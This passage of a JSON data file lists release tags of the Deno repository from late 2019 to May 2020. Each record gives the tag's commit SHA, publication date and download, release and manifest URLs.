dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.